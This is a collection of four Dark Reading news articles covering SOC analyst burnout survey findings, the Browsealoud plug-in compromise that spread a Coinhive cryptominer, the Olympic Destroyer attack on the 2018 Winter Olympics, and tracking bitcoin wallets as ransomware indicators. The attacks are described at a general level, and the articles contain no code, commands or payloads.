STE WILLIAMS

Landing a job as an entry-level security operations center (SOC) analyst often provides a foot in the door to the cybersecurity field, but a new survey shows the more seasoned a SOC staffer gets, the more likely he or she will become disillusioned with the position.

New data from the Cyentia Institute’s “Voice of the Analyst Study” of security operations center teams shows that while three in four SOC analysts are satisfied with their jobs, some 45% say the reality of the SOC isn’t what they had expected. Some 70% of entry-level (one- to two years’ experience) SOC analysts say their job meets their expectations, while just 43% of more experienced SOC analysts say so, according to the report, commissioned by SOC automation vendor Respond Software.

As one SOC analyst respondent quoted in the report explained, the novelty of a new SOC gig basically wears off after a while: “I was drawn to the SOC by misguided youthful ideals, which have been ground into a fine powder by years of poor management and lack of support from higher-ups.”

The report, provided in advance of its publication to Dark Reading, also found that job dissatisfaction ranks 25% higher among experienced SOC staffers, and one in three SOC analysts overall is currently job-hunting for a position elsewhere. Of the 160 respondents, three-quarters are SOC analysts, 20% SOC managers, and 5%, engineers or project managers in the SOC.

Wade Baker, co-founder of The Cyentia Institute and an author of the report, says he had expected entry-level SOC analysts to be the most unhappy members of the SOC, not the seasoned ones. “It was counterintuitive to me. I thought the quintessential entry-level analysts feel less respected and maybe more dissatisfied. We found the opposite: the longer you’re in the SOC and the more experience you have, dissatisfaction and things like that grow,” Baker says.

SOC analysts say they were drawn to their positions for a new challenge, skills, more money, and as a way to make a difference, but those same incentives also are what’s drawing them to leave their current jobs, according to the report. “If you want to keep them around, offering those same positives in-house is just as important as eliminating the negatives that drive them out,” the report says. “Roughly 3 out of 4 point to a desire for more intellectually challenging work, the chance to learn new skills, and/or a chance to defend and help the business.”

Change of SOCs

Entry-level, or Tier 1, SOC analyst positions are notoriously high burnout gigs. Sitting in front of a monitor and manually clicking through thousands of raw alerts from firewalls, IDS/IPS, SIEM, and endpoint tools, looking for that needle in a haystack, is at the same time both monotonous and stressful. Ignoring an alert tied to a real attack happens: just ask Target, which mistakenly dismissed alerts as false positive that flagged its massive breach in 2013.

SOC experts say the job of the entry-level SOC analyst gradually will be replaced with automation and orchestration technologies that streamline the traditionally manual, front-line role. The Tier 1 analyst position will evolve into a new more advanced role akin to the Tier 2 analyst, who triages flagged alerts.

“For me, the SOC of the future is having as much done automatically as possible” on the front lines, says Brett Wahlin, the former CISO at HP. The first level of human contact with the event data, a next-generation SOC Level 2 analyst, brings human analysis to the issue once it triggers a set threshold, for example. “It takes a human touch to see if you actually have got a bad guy or not,” he says.

Today’s Tier 1 SOC analyst job basically was born out of the mass of logs security tools produce, notes Josh Maberry, CISO at Critical Start, an MSSP. “The Tier 1 analyst was never supposed to be a manual-event job in the first place. It became that as a necessity because there weren’t any automation and orchestration [tools] there yet,” he says. “They [became] eye filters … So analysts began to drown. The whole thing became an events-to-bodies ratio.”

It’s those factors that have led to the high turnover in the SOC, experts say. The most time-consuming tasks in the SOC is monitoring, followed by intrusion analysis and shift operations handoff duties, according to the Cyentia SOC analyst survey. “The notion of monitoring taking a lot of time is not surprising,” says Mike Armistead, co-founder and CEO of Respond Software, noting that monitoring earns a low value in the tasks SOC analysts want to be doing.

Shift operations also is considered a burden: that’s when analysts receive feedback on their incident reports, or transfer information during the handoff of their shifts. “That’s the place where tribal knowledge is transferred among people,” he says, so if SOC analysts are unhappy with that process, it could be a red flag for the organization.

New data published today from a separate study by Advanced Threat Analytics (ATA) of 50 managed security services provides a glimpse at the volume of security alerts MSSPs face: nearly 45% say they see a 50% or higher rate of false positives, and 64% say it takes an average of 10 minutes or more to investigate each alert.

That volume of alerts forces SOC analysts of all levels to spend in some case smore than five hours a day investigating even false positives, according to that study. Alin Srivastava, president of ATA, says that distracts the MSSPs’ SOC analysts from real threats and incidents.

According to Cyentia’s SOC report, monitoring is the least likely task tied to catching an intruder, according to the SOC analysts in the survey. “You get the sense [from the survey] that they feel a lot of time is wasted on relatively low-value efforts,” Cyentia’s Baker says.

Automation can help eliminate the low-level, repetitive monitoring tasks that “require human fingers more than human brains,” the report says. Threat hunting and forensics, meanwhile, require humans to handle that level of anlaysis.

Related Content:

• Death of the Tier 1 SOC Analyst
• 3 Ways to Retain Security Operations Staff
• 6 Steps for Sharing Threat Intelligence
• Mischel Kwon Unplugged 

Black Hat Asia returns to Singapore with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/one-in-three-soc-analysts-now-job-hunting/d/d-id/1331040?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Over 4,200 websites were infected last weekend with a tool that quietly used the computers of people visiting the sites to mine for the Monero cryptocurrency.

Unknown attackers installed the mining software by compromising a third-party browser plug-in called Browsealoud that many websites use to provide speech navigation capabilities for people who need additional support.

Scott Helme, the UK-based researcher who first reported on the campaign says it is unclear how the attackers managed to compromise Browsealoud in order to distribute the mining tool. But TextHelp, the company that provides the plug-in has taken it down, so the campaign has been effectively stopped.

“The broad takeaway from this is that sites which load content from a supplier like this are at the mercy of that supplier unless they protect themselves,” Helme says.

Many of the impacted sites belonged to organizations in the UK and included those of major government organizations such as the Information Commissioner’s Office, National Health Service, General Medical Council, and Student Loans Company.

Also affected were the websites of the Administrative Office of the United States Courts, the Indiana government, and the Cook County Treasurer’s office in Illinois.

According to Helme, the attackers altered the Browsealoud Javascript Library so it added a Coinhive Monero cryptocurrency miner to any page that loaded the plug-in. A majority of sites using the plug-in appear to belong to government organizations based on the list of affected websites, Helme says.

The campaign is the latest to highlight the trend by threat actors to hijack computers and use them to mine for various cryptocurrencies. Mining tools like Coinhive are designed to use a computer’s resources to verify blockchain transactions. Many people voluntarily install such mining software and allow their computers to be used as part of a wider pool of systems for cryptocurrency mining. In return they get paid in digital coins. 

Threat actors have latched on to crypto mining as a way to make quick and safe money. Instead of infecting computers to steal data or to extort money from victims, a growing number of attackers have begun hijacking computers and quietly putting them to use in crypto currency mining. In other cases, attackers install the mining tools on websites and hijack the resources of anyone using those sites.

Victims often don’t realize their computers are being used for the purpose and most of the mining software itself is legitimate and therefore not always flagged as malicious or unwanted. Researchers at Cisco’s Talos security unit recently estimated that an attacker using a botnet of 2,000 hijacked computers can earn upwards of $180,000 a year from cryptocurrency mining.

Organizations can relatively easily protect their websites from being compromised by third-party plug-ins and content by implementing Content Security Policy (CSP) and Subresource Integrity (SRI) says Helme. “[These] are two mechanisms that allow a site to control which other sites are allowed to load content into their pages and what content they’re allowed to load,” he says.

For instance “browsealoud.com” could be in the list of allowed sites but “coinhive.com” wouldn’t be, so the Coinhive script wouldn’t be loaded, Helme notes.

“SRI allows you to check a file by adding an integrity attribute, sometimes called a fingerprint,” Helme said. “If the file changes, the fingerprint changes and we can detect that.”

In the present instance, such an integrity check would have detected the change in the Browsealoud script and prevented it from loading. Admins can also use CSP to require that all scripts on the page have SRI enabled, so no checks are missed. “Coupled together, these are the perfect pair,” Helme says.

“These would have helped the affected sites and would have prevented the infected file from being loaded.”

Related content:

• Crypto-Mining Attacks Emerge as the New Big Threat to Enterprises
• Hack Costs Coincheck Cryptocurrency Exchange $530 Million
• Cybercriminals Employ ‘Driveby’ Cryptocurrency Mining
• 5 Reasons Why the CISO Is a Cryptocurrency Skeptic

Black Hat Asia returns to Singapore with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier solutions and service providers in the Business Hall. Click for information on the conference and to register.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/attackers-use-infected-plug-in-to-install-cryptomining-tool-on-over-4200-websites/d/d-id/1331043?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A cyberattack targeting the 2018 Winter Olympics in Pyeongchang, South Korea aimed to cause disruption at the start of the Games and required deep knowledge of the infrastructure – a sign the attackers had previously compromised it, according to researchers.

The attack took place prior to the Opening Ceremonies held on Friday, Feb. 9 and interfered with TV and Internet systems. Olympics officials confirmed technical issues affecting non-critical systems and completed recovery within 12 hours. On Sunday, Feb. 11, they confirmed that a cyberattack had taken place but didn’t offer additional details.

Researchers at Cisco Talos identified malware samples used in the attack “with moderate confidence” and report the infection vector is currently unknown. Evidence indicates the actors responsible were not seeking information or monetary gain: Their primary goal was likely to cause destruction.

‘Olympic Destroyer’

The so-called “Olympic Destroyer” malware studied by Cisco renders machines unusable by deleting shadow copies and event logs, and tries to use PsExec and WMI to move across the environment. Talos analysts point out they had previously seen this behavior in both the BadRabbit and Nyetya (NotPetya) attacks.

The initial malware sample is a binary that drops multiple files onto the target machine. From there, the malware moves laterally throughout the network, using two information stealers and hardcoded credentials within the binary. Talos found 44 individual accounts in the library and says the malware author knew several technical details about the Olympics infrastructure including username, domain name, server name, and password data.

“This is a targeted attack and this involves some reconnaissance,” says Craig Williams, director of Cisco Talos outreach. “The attacker came into the campaign knowing a large number of accounts. That involves, obviously, a phishing campaign or an intelligence-gathering campaign.”

A key takeaway is this malware doesn’t use an exploit to spread, Williams continues. It spreads through normal tools using valid credentials, a tactic that will help attackers evade most security tools.

The destructive part of the attack starts during execution. After files are written to disk, the malware deletes all possible shadow copies on the system. It then takes steps to complicate file recovery and ensure the Windows recovery console doesn’t try to repair anything on the host.

“Wiping all available methods of recovery shows this attacker had no intention of leaving the machine usable,” Talos researchers report. The purpose of the malware is to perform destruction of the host, leave the system offline, and wipe remote data. It also disables all services on the system.

Earlier Attacks on the Olympics

This isn’t the first instance of an attack targeting the 2018 Winter Games.

McAfee Advanced Threat Research previously detected a fileless attack targeting organizations involved with the Pyeongchang Olympics. The threat used a PowerShell implant to connect target machines with the attacker’s server and transfer system-level data. At the time, researchers were unsure what happened after the attacker gained access.

Now they say this attack had a second-stage payload in the form of Gold Dragon, a Korean-language implant detected in December 2017. Gold Dragon has stronger persistence than the original PowerShell payload and expanded capabilities for profiling target systems. It lets an attacker gather information on system processes, files, registry content, and data.

In early February, prior to the Opening Ceremonies, researchers updated their findings to report another variant of the fileless implant in a new malicious document. This document had the same metadata properties and same information as the campaign discovered in January.

“It’s an indication the attacker has resumed deploying a new version of this implant,” says Ryan Sherstobitoff, senior analyst of major campaigns at McAfee. “Gold Dragon is a more persistent type of implant that gave them far-reaching capabilities on the network.”

Targeted attacks have different stages of payloads, he explains. The first gives them access; the second installs something more persistent. In this case, the earlier fileless attack could have given a threat actor the entry to drop Gold Dragon on the target network.

Sherstobitoff emphasizes there is no indication the attacker behind the earlier campaign is connected to the Opening Ceremonies-timed attack. However, Gold Dragon could have given them the level of access to collect the information they needed to conduct it.

CrowdStrike identified samples of a previously unknown malware family seemingly designed for data destruction. Earliest samples were detected on Feb. 9, the day of the Opening Ceremonies. All samples have sets of hard-coded credentials belonging to Olympics-related targets that let threat actors spread in a target network. Several attackers had access to organizations related to the targets through malicious backdoors, CrowdStrike reports, but it can’t confirm whether anyone used this access to deliver malware.

Too Soon to Determine Whodunnit

“I don’t want to say it’s trivial, but it’s not the most complicated piece of malware,” says Warren Mercer, Cisco Talos technical lead for engineering, of the attack his team studied. “There’s no crazy effort to try and obfuscate their code; there are no super-advanced techniques.”

However, he continues, it’s likely a sophisticated attacker is at play given the previous access to Olympics systems and ability to hardcode lifted credentials. The question is, which one?

“It’s a tricky question when it comes to who could be behind a threat like this,” adds Williams. This could be a new threat actor or group, he says, adding that many well-funded campaigns have pockets of developers. Attribution is further complicated by the publicity of widespread attacks like NotPetya, which have given rise to “copycats” who may be responsible, he notes.

Meanwhile, the US-CERT has issued a statement on cybersecurity at the Olympics and offered guidance for attendees to protect themselves against threats including data theft and third-party monitoring, as attackers may take advantage of the large audience to spread messages.

Engin Kirda, cofounder and chief architect at Lastline, points out how denial-of-service attack campaigns are one of the easiest attacks against large events like the Olympics. Outside event attendees and organizers, and fans are often targeted with phishing emails, domain theft, ransomware, and fake social media posts. These days, employees can expect to see malicious emails related to the Games.

“If an employee falls victim to one of these attacks on a work machine, it may put their business at risk as well,” Kirda notes. “IT teams should caution employees about clicking on links or attachments from Olympics-related emails.”

Related Content:

• Emailed Cyberattack Targets 2018 Pyeongchang Olympics
  
• 8 Nation-State Hacking Groups to Watch in 2018
• Back to Basics: AI Isn’t the Answer to What Ails Us in Cyber
• New POS Malware Steals Data via DNS Traffic

Black Hat Asia returns to Singapore with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier solutions and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/cyberattack-aimed-to-disrupt-opening-of-winter-olympics-/d/d-id/1331044?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Cryptocurrency, particularly bitcoin, has captured the attention of Wall Street and Silicon Valley over the past few months. It seems like everybody wants to talk about bitcoin as if it is something brand new.

The truth is that cryptocurrencies have been the norm on the Dark Web for quite some time. Bitcoin has been payment method of choice for ransomware and cyber extortion because it allows bad actors to operate under a cloak of anonymity. But that could be changing. Threat intelligence analysts are beginning to incorporate bitcoin wallet addresses into their investigations, and we’ll soon be able to recognize attack patterns and track attribution. One thing we’ve noticed is the ability to track, to some degree, the correlations and connections between cyberattacks by following bitcoin transactions.

In order to understand why tracking bitcoin wallet addresses as indicators of compromise (IOCs) is so valuable, we need to understand why cybercriminals use bitcoin in the first place. There are three primary reasons.

Anonymity: Bitcoin provides anonymity when payments are received and when they are cashed out. That’s because bitcoin accounts and money transfers are difficult to trace and depend largely on the cybercriminal being sloppy with operations security.

Global Currency: Hackers typically prey on out-of-country targets and need a fast, untraceable method to transfer funds across nations without worrying about account freezes. Bitcoin is used as a global currency because you don’t need to worry about the exchange rates between your home country’s currency and US dollars.

Ease of Payments: In the past, hackers used to rely on gift cards for payment. This was troublesome on many levels — for instance, gift cards can’t be used globally, and criminals needed to come up with a mailing addresses that can’t be traced. Bitcoin and the higher profile of cryptocurrency have contributed to the rise in ransomware, as well as hackers’ ability to use extortion to elicit payments. One example occurred after the Ashley Madison website breach, when hackers threatened some users with a bitcoin ransom or have their identities revealed as adulterers. Another tactic involved using malicious emails to threaten a distributed denial-of-service attack on an organization’s network unless a bitcoin payment was made.

By tracking bitcoin wallet addresses as an IOC, we’ve been able to connect the dots between ransomware, wallet addresses, and shared infrastructure, TTPs (tactics, techniques, and procedures), and attribution.

Here is an example of how bitcoin is used in a ransomware campaign: A new piece of ransomware gives you a bitcoin address for payment. You can then make correlations that connect across sectors, like retail, energy, or technology groups based on the blockchain and/or reuse of the same address. With WannaCry, there were hard-coded bitcoin addresses that made it easy to correlate what you are dealing with and which sectors were being affected. The more bitcoin addresses are shared, the more you can identify addresses to which bitcoins are forwarded.

The ability to track transactions through the blockchain allows you to connect different ransomware campaigns. Cybercriminals don’t typically share bitcoin wallets as they might share the same exploit kit, but by tracking blockchain transactions, analysts have another investigation point from which they can pivot and dig for more.

Why is it important to be able to track bitcoin wallets as IOCs? With the ability to track payments, you can determine if bitcoins are going to specific wallet addresses, and then narrow that down to determine if they are the same two or three addresses over time. This will give you some idea of where and when cybercriminals are cashing out.

The value of the metadata as an indicator for malicious activity is because, although there are many variants of ransomware, the number of variants does not necessarily represent separate campaigns or cybercriminal groups. If you can follow the transactions through the blockchain, you can see how or if these variants are connected, and identify specific campaigns.

There is a well-known saying that if you want to know where trouble is coming from, follow the money. It’s hard to follow bitcoins, but all of those bitcoin wallets can help you see how ransomware is connected.

This research was provided by the TruSTAR Data Science Unit. Click here to download the top ten bitcoin addresses with the highest IOC correlations on our platform.

Related Content:

• Block Threats Faster: Pattern Recognition in Exploit Kits
• Forget APTs: Let’s Talk about Advanced Persistent Infrastructure
• 6 Steps for Sharing Threat Intelligence

Curtis Jordan is TruSTAR’s lead security engineer where he manages engagement with the TruSTAR network of security operators from Fortune 100 companies and leads security research and intelligence analysis. Prior to working with TruSTAR, Jordan worked at CyberPoint … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/tracking-bitcoin-wallets-as-iocs-for-ransomware-/a/d-id/1331016?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple